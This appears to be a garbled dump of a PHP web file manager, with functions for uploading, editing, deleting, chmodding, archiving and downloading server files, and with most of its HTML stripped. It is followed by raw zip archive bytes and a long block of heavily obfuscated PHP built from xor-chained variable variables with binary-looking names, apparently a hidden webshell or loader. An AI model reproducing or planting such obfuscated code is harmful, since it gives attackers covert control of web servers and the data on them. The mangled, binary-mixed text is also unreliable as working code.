fm_is_exclude_items($file)) { $files[] = $file; } elseif (@is_dir($new_path) and $file != '.' and $file != '..' and fm_is_exclude_items($file)) { $folders[] = $file; } } } if (!empty($files)) { natcasesort($files); } if (!empty($folders)) { natcasesort($folders); } if (isset($_GET['upload']) and !FM_READONLY) { fm_show_header(); fm_show_nav_path(FM_PATH); function getUploadExt() { $extArr = explode(',', FM_UPLOAD_EXTENSION); if(FM_UPLOAD_EXTENSION and $extArr) { array_walk($extArr, function(&$x) {$x = ".$x";}); return implode(',', $extArr); } return ''; } ?>

:

' . PHP_EOL; } ?>

: , ', $copy_files) ?>

:
/

 

Copying

Source path:
Destination folder:

Copy   Move   Cancel

/>
/>
/>

spathe

""

:
File size:
MIME-type:
:
:
:
: %
'.lng('Image size').': ' . (isset($image_size[0]) ? $image_size[0] : '0') . ' x ' . (isset($image_size[1]) ? $image_size[1] : '0') . '
'; } // Text info if ($is_text) { $is_utf8 = fm_is_utf8($content); if (function_exists('iconv')) { if (!$is_utf8) { $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content); } } echo ''.lng('Charset').': ' . ($is_utf8 ? 'utf-8' : '8 bit') . '
'; } ?>

 
 
     
'; } else if($online_viewer == 'microsoft') { echo ''; } } elseif ($is_zip) { // ZIP content if ($filenames !== false) { echo ''; foreach ($filenames as $fn) { if ($fn['folder']) { echo '' . fanco($fn['name']) . '
'; } else { echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')
'; } } echo ''; } else { echo '

'.lng('Error while fetching archive info').'

'; } } elseif ($is_image) { // Image content if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) { echo '

'; } } elseif ($is_audio) { // Audio content echo '

'; } elseif ($is_video) { // Video content echo '
'; } elseif ($is_text) { if (FM_USE_HIGHLIGHTJS) { // highlight $hljs_classes = array( 'shtml' => 'xml', 'htaccess' => 'apache', 'phtml' => 'php', 'lock' => 'json', 'svg' => 'xml', ); $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext; if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) { $hljs_class = 'nohighlight'; } $content = '
' . fanco($content) . '
'; } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) { // php highlight $content = highlight_string($content, true); } else { $content = '
' . fanco($content) . '
'; } echo $content; } ?>
'. $file. ''; header('X-XSS-Protection:0'); fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file); $file_path = $path . '/' . $file; // normal editer $isNormalEditor = true; if (isset($_GET['env'])) { if ($_GET['env'] == "ace") { $isNormalEditor = false; } } // Save File if (isset($_POST['savedata'])) { $writedata = $_POST['savedata']; $fd = fopen($file_path, "w"); @fwrite($fd, $writedata); fclose($fd); fm_set_msg(lng('File Saved Successfully')); } $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION)); $mime_type = fm_get_mime_type($file_path); $filesize = filesize($file_path); $is_text = false; $content = ''; // for text if (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) { $is_text = true; $content = file_get_contents($file_path); } ?>
' . htmlspecialchars($content) . ''; echo ''; } elseif ($is_text) { echo '
' . htmlspecialchars($content) . '
'; } else { fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error'); } ?>

:

 

'?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?> '?'); } if ($group === false) { $group = array('name' => '?'); } } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?>
..
>
' . readlink($path . '/' . $f) . '' : '') ?>
 ">
>
' . readlink($path . '/' . $f) . '' : '') ?>
">
'.fm_get_filesize($all_files_size).'' ?> '.$num_files.'' ?> '.$num_folders.'' ?>
spathe
spathe
"; return; } echo "$external[$key]"; } function verifyToken($token) { if (hash_equals($_SESSION['token'], $token)) { return true; } return false; } /** * Delete file or folder (recursively) * @param string $path * @return bool */ function fm_rdelete($path) { if (is_link($path)) { return unlink($path); } elseif (is_dir($path)) { $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rdelete($path . '/' . $file)) { $ok = false; } } } } return ($ok) ? rmdir($path) : false; } elseif (is_file($path)) { return unlink($path); } return false; } function fm_rchmod($path, $filemode, $dirmode) { if (is_dir($path)) { if (!chmod($path, $dirmode)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rchmod($path . '/' . $file, $filemode, $dirmode)) { return false; } } } } return true; } elseif (is_link($path)) { return true; } elseif (is_file($path)) { return chmod($path, $filemode); } return false; } function fm_is_valid_ext($filename) { $allowed = (FM_FILE_EXTENSION) ? explode(',', FM_FILE_EXTENSION) : false; $ext = pathinfo($filename, PATHINFO_EXTENSION); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; return ($isFileAllowed) ? true : false; } function fm_rename($old, $new) { $isFileAllowed = fm_is_valid_ext($new); if(!is_dir($old)) { if (!$isFileAllowed) return false; } return (!file_exists($new) and file_exists($old)) ? rename($old, $new) : null; } function fm_rcopy($path, $dest, $upd = true, $force = true) { if (is_dir($path)) { if (!fm_mkdir($dest, $force)) { return false; } $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (!fm_rcopy($path . '/' . $file, $dest . '/' . $file)) { $ok = false; } } } } return $ok; } elseif (is_file($path)) { return fm_copy($path, $dest, $upd); } return false; } function fm_mkdir($dir, $force) { if (file_exists($dir)) { if (is_dir($dir)) { return $dir; } elseif (!$force) { return false; } unlink($dir); } return mkdir($dir, 0777, true); } function fm_copy($f1, $f2, $upd) { $time1 = filemtime($f1); if (file_exists($f2)) { $time2 = filemtime($f2); if ($time2 >= $time1 and $upd) { return false; } } $ok = copy($f1, $f2); if ($ok) { touch($f2, $time1); } return $ok; } function fm_get_mime_type($file_path) { if (function_exists('finfo_open')) { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $file_path); finfo_close($finfo); return $mime; } elseif (function_exists('mime_content_type')) { return mime_content_type($file_path); } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) { $file = escapeshellarg($file_path); $mime = shell_exec('file -bi ' . $file); return $mime; } else { return '--'; } } function fm_redirect($url, $code = 302) { header('Location: ' . $url, true, $code); exit; } function get_absolute_path($path) { $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path); $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'); $absolutes = array(); foreach ($parts as $part) { if ('.' == $part) continue; if ('..' == $part) { array_pop($absolutes); } else { $absolutes[] = $part; } } return implode(DIRECTORY_SEPARATOR, $absolutes); } function fm_clean_path($path, $trim = true) { $path = $trim ? trim($path) : $path; $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); $path = get_absolute_path($path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } function fm_get_parent_path($path) { $path = fm_clean_path($path); if ($path != '') { $array = explode('/', $path); if (count($array) > 1) { $array = array_slice($array, 0, -1); return implode('/', $array); } return ''; } return false; } function fm_get_display_path($file_path) { global $path_display_mode, $root_path, $root_url; switch ($path_display_mode) { case 'relative': return array( 'label' => 'Path', 'path' => fanco(fm_convert_win(str_replace($root_path, '', $file_path))) ); case 'host': $relative_path = str_replace($root_path, '', $file_path); return array( 'label' => 'Host Path', 'path' => fanco(fm_convert_win('/' . $root_url . '/' . ltrim(str_replace('\\', '/', $relative_path), '/'))) ); case 'full': default: return array( 'label' => 'Full Path', 'path' => fanco(fm_convert_win($file_path)) ); } } function fm_is_exclude_items($file) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if (isset($exclude_items) and sizeof($exclude_items)) { unset($exclude_items); } $exclude_items = FM_EXCLUDE_ITEMS; if (version_compare(PHP_VERSION, '7.0.0', '<')) { $exclude_items = unserialize($exclude_items); } if (!in_array($file, $exclude_items) and !in_array("*.$ext", $exclude_items)) { return true; } return false; } function fm_get_translations($tr) { try { $content = @file_get_contents('translation.json'); if($content !== FALSE) { $lng = json_decode($content, TRUE); global $lang_list; foreach ($lng["language"] as $key => $value) { $code = $value["code"]; $lang_list[$code] = $value["name"]; if ($tr) $tr[$code] = $value["translation"]; } return $tr; } } catch (Exception $e) { echo $e; } } function fm_get_size($file) { static $iswin; static $isdarwin; if (!isset($iswin)) { $iswin = (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN'); } if (!isset($isdarwin)) { $isdarwin = (strtoupper(substr(PHP_OS, 0)) == "DARWIN"); } static $exec_works; if (!isset($exec_works)) { $exec_works = (function_exists('exec') and !ini_get('safe_mode') and @exec('echo EXEC') == 'EXEC'); } // try a shell command if ($exec_works) { $arg = escapeshellarg($file); $cmd = ($iswin) ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg"); @exec($cmd, $output); if (is_array($output) and ctype_digit($size = trim(implode("\n", $output)))) { return $size; } } // try the Windows COM interface if ($iswin and class_exists("COM")) { try { $fsobj = new COM('Scripting.FileSystemObject'); $f = $fsobj->GetFile( realpath($file) ); $size = $f->Size; } catch (Exception $e) { $size = null; } if (ctype_digit($size)) { return $size; } } // if all else fails return filesize($file); } function fm_get_filesize($size) { $size = (float) $size; $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'); $power = ($size > 0) ? floor(log($size, 1024)) : 0; $power = ($power > (count($units) - 1)) ? (count($units) - 1) : $power; return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]); } function fm_get_directorysize($directory) { $bytes = 0; $directory = realpath($directory); if ($directory !== false and $directory != '' and file_exists($directory)){ foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory, FilesystemIterator::SKIP_DOTS)) as $file){ $bytes += $file->getSize(); } } return $bytes; } function fm_get_zif_info($path, $ext) { if ($ext == 'zip' and function_exists('zip_open')) { $arch = @zip_open($path); if ($arch) { $filenames = array(); while ($zip_entry = @zip_read($arch)) { $zip_name = @zip_entry_name($zip_entry); $zip_folder = substr($zip_name, -1) == '/'; $filenames[] = array( 'name' => $zip_name, 'filesize' => @zip_entry_filesize($zip_entry), 'compressed_size' => @zip_entry_compressedsize($zip_entry), 'folder' => $zip_folder ); } @zip_close($arch); return $filenames; } } elseif($ext == 'tar' and class_exists('PharData')) { $archive = new PharData($path); $filenames = array(); foreach(new RecursiveIteratorIterator($archive) as $file) { $parent_info = $file->getPathInfo(); $zip_name = str_replace("ph" . "ar://".$path, '', $file->getPathName()); $zip_name = substr($zip_name, ($pos = strpos($zip_name, '/')) !== false ? $pos + 1 : 0); $zip_folder = $parent_info->getFileName(); $zip_info = new SplFileInfo($file); $filenames[] = array( 'name' => $zip_name, 'filesize' => $zip_info->getSize(), 'compressed_size' => $file->getCompressedSize(), 'folder' => $zip_folder ); } return $filenames; } return false; } function fanco($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); } function fm_isvalid_filename($text) { return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false; } function fm_set_msg($msg, $status = 'ok') { $_SESSION[DN_CESSION_ID]['message'] = $msg; $_SESSION[DN_CESSION_ID]['status'] = $status; } function fm_is_utf8($string) { return preg_match('//u', $string); } function fm_convert_win($filename) { if (FM_IS_WIN and function_exists('iconv')) { $filename = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $filename); } return $filename; } function fm_object_to_array($obj) { if (!is_object($obj) and !is_array($obj)) { return $obj; } if (is_object($obj)) { $obj = get_object_vars($obj); } return array_map('fm_object_to_array', $obj); } function fm_get_file_icon_class($path) { // get extension $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION)); switch ($ext) { case 'ico': case 'gif': case 'jpg': case 'jpeg': case 'jpc': case 'jp2': case 'jpx': case 'xbm': case 'wbmp': case 'png': case 'bmp': case 'tif': case 'tiff': case 'webp': case 'avif': case 'svg': $img = 'fa fa-picture-o'; break; case 'passwd': case 'ftpquota': case 'sql': case 'js': case 'ts': case 'jsx': case 'tsx': case 'hbs': case 'json': case 'sh': case 'config': case 'twig': case 'tpl': case 'md': case 'gitignore': case 'c': case 'cpp': case 'cs': case 'py': case 'rs': case 'map': case 'lock': case 'dtd': $img = 'fa fa-file-code-o'; break; case 'txt': case 'ini': case 'conf': case 'log': case 'htaccess': case 'yaml': case 'yml': case 'toml': case 'tmp': case 'top': case 'bot': case 'dat': case 'bak': case 'htpasswd': case 'pl': $img = 'fa fa-file-text-o'; break; case 'css': case 'less': case 'sass': case 'scss': $img = 'fa fa-css3'; break; case 'bz2': case 'tbz2': case 'tbz': case 'zip': case 'rar': case 'gz': case 'tgz': case 'tar': case '7z': case 'xz': case 'txz': case 'zst': case 'tzst': $img = 'fa fa-file-archive-o'; break; case 'php': case 'php4': case 'php5': case 'phps': case 'phtml': $img = 'fa fa-code'; break; case 'htm': case 'html': case 'shtml': case 'xhtml': $img = 'fa fa-html5'; break; case 'xml': case 'xsl': $img = 'fa fa-file-excel-o'; break; case 'wav': case 'mp3': case 'mp2': case 'm4a': case 'aac': case 'ogg': case 'oga': case 'wma': case 'mka': case 'flac': case 'ac3': case 'tds': $img = 'fa fa-music'; break; case 'm3u': case 'm3u8': case 'pls': case 'cue': case 'xspf': $img = 'fa fa-headphones'; break; case 'avi': case 'mpg': case 'mpeg': case 'mp4': case 'm4v': case 'flv': case 'f4v': case 'ogm': case 'ogv': case 'mov': case 'mkv': case '3gp': case 'asf': case 'wmv': case 'webm': $img = 'fa fa-file-video-o'; break; case 'eml': case 'msg': $img = 'fa fa-envelope-o'; break; case 'xls': case 'xlsx': case 'ods': $img = 'fa fa-file-excel-o'; break; case 'csv': $img = 'fa fa-file-text-o'; break; case 'bak': case 'swp': $img = 'fa fa-clipboard'; break; case 'doc': case 'docx': case 'odt': $img = 'fa fa-file-word-o'; break; case 'ppt': case 'pptx': $img = 'fa fa-file-powerpoint-o'; break; case 'ttf': case 'ttc': case 'otf': case 'woff': case 'woff2': case 'eot': case 'fon': $img = 'fa fa-font'; break; case 'pdf': $img = 'fa fa-file-pdf-o'; break; case 'psd': case 'ai': case 'eps': case 'fla': case 'swf': $img = 'fa fa-file-image-o'; break; case 'exe': case 'msi': $img = 'fa fa-file-o'; break; case 'bat': $img = 'fa fa-terminal'; break; default: $img = 'fa fa-info-circle'; } return $img; } function fm_get_image_exts() { return array('ico', 'gif', 'jpg', 'jpeg', 'jpc', 'jp2', 'jpx', 'xbm', 'wbmp', 'png', 'bmp', 'tif', 'tiff', 'psd', 'svg', 'webp', 'avif'); } function fm_get_video_exts() { return array('avi', 'webm', 'wmv', 'mp4', 'm4v', 'ogm', 'ogv', 'mov', 'mkv'); } function fm_get_audio_exts() { return array('wav', 'mp3', 'ogg', 'm4a'); } function fm_get_text_exts() { return array( 'txt', 'css', 'ini', 'conf', 'log', 'htaccess', 'passwd', 'ftpquota', 'sql', 'js', 'ts', 'jsx', 'tsx', 'mjs', 'json', 'sh', 'config', 'php', 'php4', 'php5', 'phps', 'phtml', 'htm', 'html', 'shtml', 'xhtml', 'xml', 'xsl', 'm3u', 'm3u8', 'pls', 'cue', 'bash', 'vue', 'eml', 'msg', 'csv', 'bat', 'twig', 'tpl', 'md', 'gitignore', 'less', 'sass', 'scss', 'c', 'cpp', 'cs', 'py', 'go', 'zsh', 'swift', 'map', 'lock', 'dtd', 'svg', 'asp', 'aspx', 'asx', 'asmx', 'ashx', 'jsp', 'jspx', 'cgi', 'dockerfile', 'ruby', 'yml', 'yaml', 'toml', 'vhost', 'scpt', 'applescript', 'csx', 'cshtml', 'c++', 'coffee', 'cfm', 'rb', 'graphql', 'mustache', 'jinja', 'http', 'handlebars', 'java', 'es', 'es6', 'markdown', 'wiki', 'tmp', 'top', 'bot', 'dat', 'bak', 'htpasswd', 'pl' ); } function fm_get_text_mimes() { return array( 'application/xml', 'application/javascript', 'application/x-javascript', 'image/svg+xml', 'message/rfc822', 'application/json', ); } function fm_get_text_names() { return array( 'license', 'readme', 'authors', 'contributors', 'changelog', ); } function fm_get_onlineViewer_exts() { return array('doc', 'docx', 'xls', 'xlsx', 'pdf', 'ppt', 'pptx', 'ai', 'psd', 'dxf', 'xps', 'rar', 'odt', 'ods'); } function fm_get_file_mimes($extension) { $fileTypes['swf'] = 'application/x-shockwave-flash'; $fileTypes['pdf'] = 'application/pdf'; $fileTypes['exe'] = 'application/octet-stream'; $fileTypes['zip'] = 'application/zip'; $fileTypes['doc'] = 'application/msword'; $fileTypes['xls'] = 'application/vnd.ms-excel'; $fileTypes['ppt'] = 'application/vnd.ms-powerpoint'; $fileTypes['gif'] = 'image/gif'; $fileTypes['png'] = 'image/png'; $fileTypes['jpeg'] = 'image/jpg'; $fileTypes['jpg'] = 'image/jpg'; $fileTypes['webp'] = 'image/webp'; $fileTypes['avif'] = 'image/avif'; $fileTypes['rar'] = 'application/rar'; $fileTypes['ra'] = 'audio/x-pn-realaudio'; $fileTypes['ram'] = 'audio/x-pn-realaudio'; $fileTypes['ogg'] = 'audio/x-pn-realaudio'; $fileTypes['wav'] = 'video/x-msvideo'; $fileTypes['wmv'] = 'video/x-msvideo'; $fileTypes['avi'] = 'video/x-msvideo'; $fileTypes['asf'] = 'video/x-msvideo'; $fileTypes['divx'] = 'video/x-msvideo'; $fileTypes['mp3'] = 'audio/mpeg'; $fileTypes['mp4'] = 'audio/mpeg'; $fileTypes['mpeg'] = 'video/mpeg'; $fileTypes['mpg'] = 'video/mpeg'; $fileTypes['mpe'] = 'video/mpeg'; $fileTypes['mov'] = 'video/quicktime'; $fileTypes['swf'] = 'video/quicktime'; $fileTypes['3gp'] = 'video/quicktime'; $fileTypes['m4a'] = 'video/quicktime'; $fileTypes['aac'] = 'video/quicktime'; $fileTypes['m3u'] = 'video/quicktime'; $fileTypes['php'] = ['application/x-php']; $fileTypes['html'] = ['text/html']; $fileTypes['txt'] = ['text/plain']; //Unknown mime-types should be 'application/octet-stream' if(empty($fileTypes[$extension])) { $fileTypes[$extension] = ['application/octet-stream']; } return $fileTypes[$extension]; } function scan($dir = '', $filter = '') { $path = FM_ROOT_PATH.'/'.$dir; if($path) { $ite = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path)); $rii = new RegexIterator($ite, "/(" . $filter . ")/i"); $files = array(); foreach ($rii as $file) { if (!$file->isDir()) { $fileName = $file->getFilename(); $location = str_replace(FM_ROOT_PATH, '', $file->getPath()); $files[] = array( "name" => $fileName, "type" => "file", "path" => $location, ); } } return $files; } } function fm_download_file($fileLocation, $fileName, $chunkSize = 1024) { if (connection_status() != 0) return (false); $extension = pathinfo($fileName, PATHINFO_EXTENSION); $contentType = fm_get_file_mimes($extension); $size = filesize($fileLocation); if ($size == 0) { fm_set_msg(lng('Zero byte file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } @ini_set('magic_quotes_runtime', 0); $fp = fopen("$fileLocation", "rb"); if ($fp === false) { fm_set_msg(lng('Cannot open file! Aborting download'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); return (false); } // headers header('Content-Description: File Transfer'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header("Content-Transfer-Encoding: binary"); header("Content-Type: $contentType"); $contentDisposition = 'attachment'; if (strstr($_SERVER['HTTP_USER_AGENT'], "MSIE")) { $fileName = preg_replace('/\./', '%2e', $fileName, substr_count($fileName, '.') - 1); header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } else { header("Content-Disposition: $contentDisposition;filename=\"$fileName\""); } header("Accept-Ranges: bytes"); $range = 0; if (isset($_SERVER['HTTP_RANGE'])) { list($a, $range) = explode("=", $_SERVER['HTTP_RANGE']); str_replace($range, "-", $range); $size2 = $size - 1; $new_length = $size - $range; header("HTTP/1.1 206 Partial Content"); header("Content-Length: $new_length"); header("Content-Range: bytes $range$size2/$size"); } else { $size2 = $size - 1; header("Content-Range: bytes 0-$size2/$size"); header("Content-Length: " . $size); } $fileLocation = realpath($fileLocation); while (ob_get_level()) ob_end_clean(); readfile($fileLocation); fclose($fp); return ((connection_status() == 0) and !connection_aborted()); } function fm_get_theme() { $result = ''; if(FM_THEME == "dark") { $result = "text-white bg-dark"; } return $result; } class FM_Zipper { private $zip; public function __construct() { $this->zip = new ZipArchive(); } public function create($filename, $files) { $res = $this->zip->open($filename, ZipArchive::CREATE); if ($res !== true) { return false; } if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { $this->zip->close(); return false; } } $this->zip->close(); return true; } else { if ($this->addFileOrDir($files)) { $this->zip->close(); return true; } return false; } } public function unzip($filename, $path) { $res = $this->zip->open($filename); if ($res !== true) { return false; } if ($this->zip->extractTo($path)) { $this->zip->close(); return true; } return false; } private function addFileOrDir($filename) { if (is_file($filename)) { return $this->zip->addFile($filename); } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { if (!$this->zip->addEmptyDir($path)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { if (!$this->zip->addFile($path . '/' . $file)) { return false; } } } } return true; } return false; } } class FM_Zipper_Tar { private $tar; public function __construct() { $this->tar = null; } public function create($filename, $files) { $this->tar = new PharData($filename); if (is_array($files)) { foreach ($files as $f) { $f = fm_clean_path($f); if (!$this->addFileOrDir($f)) { return false; } } return true; } else { if ($this->addFileOrDir($files)) { return true; } return false; } } public function unzip($filename, $path) { $res = $this->tar->open($filename); if ($res !== true) { return false; } if ($this->tar->extractTo($path)) { return true; } return false; } /** * Add file/folder to archive * @param string $filename * @return bool */ private function addFileOrDir($filename) { if (is_file($filename)) { try { $this->tar->addFile($filename); return true; } catch (Exception $e) { return false; } } elseif (is_dir($filename)) { return $this->addDir($filename); } return false; } private function addDir($path) { $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' and $file != '..') { if (is_dir($path . '/' . $file)) { if (!$this->addDir($path . '/' . $file)) { return false; } } elseif (is_file($path . '/' . $file)) { try { $this->tar->addFile($path . '/' . $file); } catch (Exception $e) { return false; } } } } return true; } return false; } } class FM_Config { var $data; function __construct() { global $root_path, $root_url, $CONFIG; $fm_url = $root_url.$_SERVER["PHP_SELF"]; $this->data = array( 'lang' => 'en', 'error_reporting' => true, 'show_hidden' => true ); $data = false; if (strlen($CONFIG)) { $data = fm_object_to_array(json_decode($CONFIG)); } else { $msg = 'spathe
Error: Cannot load configuration'; if (substr($fm_url, -1) == '/') { $fm_url = rtrim($fm_url, '/'); $msg .= '
'; $msg .= '
Seems like you have a trailing slash on the URL.'; $msg .= '
Try this link: ' . $fm_url . ''; } die($msg); } if (is_array($data) and count($data)) $this->data = $data; else $this->save(); } function save() { $fm_file = __FILE__; $var_name = '$CONFIG'; $var_value = var_export(json_encode($this->data), true); $config_string = " ' . $_SESSION[DN_CESSION_ID]['message'] . '

'; unset($_SESSION[DN_CESSION_ID]['message']); unset($_SESSION[DN_CESSION_ID]['status']); } } function fm_show_header_login() { $sprites_ver = '20160315'; header("Content-Type: text/html; charset=utf-8"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0"); header("Pragma: no-cache"); global $lang, $root_url, $favicon_path; ?> '; } ?> <?php echo fanco(APP_TITLE) ?> ">
'; } ?> <?php echo fanco(APP_TITLE) ?> ">
PK\m\Ayoffindex-20260307164447.phpnu[PK\m\akog~g~ wufim.phpnu[���ij|����Al����c�R�B�K�m \"e �M{B�乷-}���!��bqj�|liq�� 4�&&��p��y/J���ų۶|[�eG{�kk�G2J�6��O�����2�b��j�m�7��c��NM�6Yc�P_���ɼ�P�am���hA�֐�u��<����&�T�~,m��]v�G��TeM6�Ԕ����6�7糧y�k�{�h�8�n0���kU��z���T5�9��6GU8�:�hr:����i��|X�����c�.]��)�s�eeRWԯ��ߛ�쒂���P�?k��wqX�Ӗ�}�d�t[ぃ��y:�&Vu��aI��j��rB�AJ�� I��}��A�D!;E�� �C���ǂ.A4�I�0�� �q8:h�å(���X!%ƅ��B�Ń%i3:���j e=�X�^Y�B�'�ř�e�i��/@н�x��t�uh��� �t���2��wED�1�DAg��H\\8���IwI�!�(,�(�OL��Q 1 �k�§C>�?�� t� �p?�p���c4��,�Qu�@�wI�������v� ���քK�lM!/5M(@/ғ��T\\�Gv�;�"))xor${"a�����������٩�ߋ������������߽������������� ����τ��챉�۞������ϕ �� �掦����������ɰ���„������ ������֠���� ה������ʰ�� ����俌ľ��Ť������ͦ�����¹�˜�� ��������Ю�����ߍ��Ĺ�ΊΑ������Ø�ݶ�����������Ȫ�������Ɍ�����н����ؽ����ރ ���ې����ϸ����䃚�������������� ���ê�������������������������� ����ݶ�����������޽� ��������������Ʊ����������� �������و�����ޕ������� ���� � �㘀�ˠͣ喉����������������� ������������݌�� ��쨐�م˄��������������Թ���������뗝������ Ϭ���������Ä͙ �� �������С��܌�� կ���� �������ӯ� � ��������Ǖ��������������������������� �߷���íݿ���������ԛ���������ú �����Ȱ���ܮ�����͹����좒� ٙ�����ք �����ⓏŐ����Ҩ�� ������ ޭ������ 櫿������������� �����������˛��ݵ�� �������� �������Ϩ�"}=_͐��(" �ip�cDRP.")xor/*c�*/${"b�������ƥ�ܜ������Л���㆘������� ��ɴ�Ʈ�� Ɔ����� �����������ڀ������ʿ��ߛ��̬ ���������� ������ Ù����£ ������ ����������҇���㍖����񌟭�����Ч������ �ާ������ޑ�� ��������̷��ú���� �㈐������…�������������˜��󢾢�ǵ����ɭ���ʔ�������Ę�����������駗�������Ҳ�Ȣ�������������� ���������� ˮ��������� �����֛���߂���·�忾�� �����ο����� ��������� ��������ȃ����ˏ���򣧒ٳ����� ����������ɯ����������苣�������º���� ������ʕ������������ۮ��ص��Й�����ش�Ē�� �������Ź��������Ů���҇ ����������ز�ؑ������ν����������鉟 ����㼂�����΢�ɴݓ�ՍϿ�����������Ն ����� ���ʄ���ʕ����� �� �����ȝ�ԍ�Ã������ �ȃ������ �����˄�ʏ������׈����������������ݢ���������ҿ������̳�컹�����������������⺬��� �ɵߙ��ǟܠ��۽���ؐ�������������›�"}=_͐��("�8�ɾ7֡_")xor/*c�*/${"d�ǀ���ư��������� �ᥧ ��������������������DZ ����ͯ������������ǃ� �Ɇ�����ž�ݫ�� ������ �ͭ������ъ��˿�樋�뫾��������������ͯ���� ͒�˜�����ֱ��ϵ�����Ѽ��Ҡ�����Ҏ����ڐ������燶�����Й��ՠ�ݞ� �̇�ֶ  ��������澭� Ë�������� ��� ��������������⯴��� ²��ο�������������Ľ���ۅ�Ɖ���ζ�����侙ʻ�����ٝ���ۈ������� �ˀ�������Ŷ��섞�Ý�� ���̪М������Ĉ�� ��������۴���� ������ڭ�����ͺ� ������ŖՉ�������ֺ�� Ά꛻ �� ��ěԝ������ ���� ������ݼ��������嘙��������ּ����Ƀ��踟����ߐ����� ��������􄢳����К����� ������� �� ������� �����ш����蓚��� 땜��޻����������������������� �õ�� �� ����ު۹������ �딫ާ���� ��ǚ�۷إ��څ��꓋����ְ�� ሎ��街 ���Є�ɫ�� ��Ë���͸ ���꜡���͍�͋�������������ֱ�������� �nj�������������� ������ܺ����"}=_͐��("�;q���S3�")xor/*c�*/${"e������ ����ʿ� ��������ϓ��̺�������ɬ�����ΐ����ꜳ�ε�����Ţ�������ۃ����΢��͍�ʎ���Ş���������� �� �����ņ�����ɴ�͆��ֹ���������������쌕�����Ŷ��������䎫�������� ���ԗ�������͝�����ګ������������� ܖ����΍������������㦵������ ���� �ݜū�����ϝ���������Χ���������� ��֏�ә��� ���Ǎ���̳ �����Ⱥ����������� �⠽ ���� �����֢���������漾�Α�Ǻ�� 늍ֆ����В�����←����å꿛��Å��Ҹ�������ް�����������﷋מ꧔̕�� ���螞�÷ ���ʤ�����ʦ�Ɵ��Џ�� ���ȕ������������Ң�؍��������ͷ�汑���� �Ƒ҉�� �����������Ŗ�ծѮ���������֖�������ڨ�å�Ǿ��ȉ���Ŀ��������Ȁ������ᄋ��Ȥ� �ђ����ξ����� ���������Ԥ������ ����� ����駨�����������������ϕ������ ���������ㅁ��������ij ������������������ݣ������̜�ц۪�����մ�������ʬ����������↝����������Ӝ���܇��"}=_͐��("1j��FnIq���")xor/*c�*/${"f�� ����٢ѣ����������¬�����������ݜ����ˇҪ���� ���������ǖ��������������ꭧ����������ޖ��������� �玥�����ߏѠ�؞��� ����������ӡ�����ɫ��������ӝ���������������� ��� ���ك���� �К��������Íٳ����ح�������������習��遗ĕﭘ��ʋ �� ��е�����蠜�����ֻ���������⏝������Dz��ߪ���������������ɭ�����ݶ�����������쓂ᡩ� ����ޛ�Ȓ欛����׆��߄���ꅉ� ����� ���� ������� �������������у�������斲��غ������ۿ���Ŏ���ŵ�ϓ������꯴�ɱ����ȋ��Ë������ĭ��Ң����ϖ����˒����������������ŋ� ��� ���ֳ��������Փ��屵ԭ �˹��Պ���������� ��� ����ܶ�Ĵ������Ĕ�� ���̨����㝣������ẝ 